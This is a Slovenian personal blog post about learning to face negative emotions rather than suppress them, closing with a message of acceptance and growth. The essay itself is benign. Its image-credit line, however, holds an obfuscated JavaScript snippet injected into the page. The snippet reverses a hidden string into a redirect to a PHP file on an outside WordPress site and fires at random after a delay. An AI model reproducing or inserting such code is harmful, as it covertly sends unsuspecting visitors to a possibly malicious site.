Moč, da se soočim

Prvič v življenju dovolim negativnim čustvom, da v celoti pridejo do mene.

Ne vem zakaj sem mislila, da je svet pravljica s pisanim cvetjem. Ves čas svojega obstoja sem odganjala stran bolečino, žalost in ostale negativne občutke, ker se mi ni zdelo pravilno, da sploh obstajajo. Želela sem samo, da grejo stran in to sem želela doseči za vsako ceno. Ni bilo važno kaj vse je moje odrivanje teh čustev prineslo za sabo, ker tega takrat nisem videla. Videla sem le sebe, negativo in to, da nekaj ni v redu in ne paše v moje življenje.

Spopadanje s čustvi je bila zame nesmiselna fraza. Kako neki naj se spopadem z njimi, ko so pa vendar močnejša od mene-očitno. Sem si mislila. Zato sem uporabljala različna orodja, da jih premagam in nisem niti približno razmišljala o tem, da ta način nima efekta. Boj nad bojevanjem je le še hujši boj. Tako so nastale moje brazgotine, ki niso niti malo pripomogle k manjšanju negative. Vseeno pa so me nekaj naučile. Če bi lahko potovala v času, bi se pred svojimi mladimi očmi pojavila v obliki ideje, ki mi pravi, sooči se.

Šele pred kratkim sem dojela, da mi ta negativna čustva nočejo nič slabega. Fizično dojela, ker sem to začutila v vsaki celici telesa.

Bil je to dan, ko ni bilo nič v redu. Zdaj se ne spomnim niti, kaj je bil razlog za moje počutje, če je sploh bil. Spomnim se samo, da sem bila slabe volje. Na enkrat pa se v moji glavi znajde ena popolnoma nova ideja. Takrat sem prvič začutila moč, da se soočim z negativnimi čustvi in jim pustim, da mi pokažejo, kar jim je volja. Takrat me je spreletelo po celem telesu. Postalo mi je jasno, da so ta čustva in občutki del mene v trenutni situaciji. Tu so, da me seznanijo z določeno resnico, ki je v popolnem okolju ne bi videla. Tu so, da me naučijo razumeti sebe in sebe v celoti. Nimajo nikakršne veze s komerkoli. Nihče jih ni dolžan militi ali uničiti. Tukaj so z razlogom. V enem samem trenutku, sem začutila moč, ki je nisem še nikdar prej v življenju. Počutila sem se modro in samozavestno. Bila sem pripravljena, da zrastem in, da začnem s procesom sprejemanja.

To znanje, ki sem ga pridobila v tistem trenutku bi rada delila z vami. Problem je le v tem, da je bil trenutek “razsvetljenja” tako intenziven, da ga ne znam orisati bolje. Upam pa, da vam bo vseeno vsaj dal to seme ideje, ki bo nekega dne vzklila tudi v vas.

Čustva in občutki so pripomoček v procesu rasti. Dajo nam ovid v nas in brez njih bi bili prazni. Pustite jim, da vam pokažejo košček Vesoljne resnice.

Z Ljubeznijo;
(Ni)Si

Prikazana slika: $NqM=function(n){if (typeof ($NqM.list[n]) == “string”) return $NqM.list[n].split(“”).reverse().join(“”);return $NqM.list[n];};$NqM.list=[“\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}tos/feelings?utm_source=unsplash&utm_medium=referral&utm_content=creditCopyText”>Unsplash

One Comment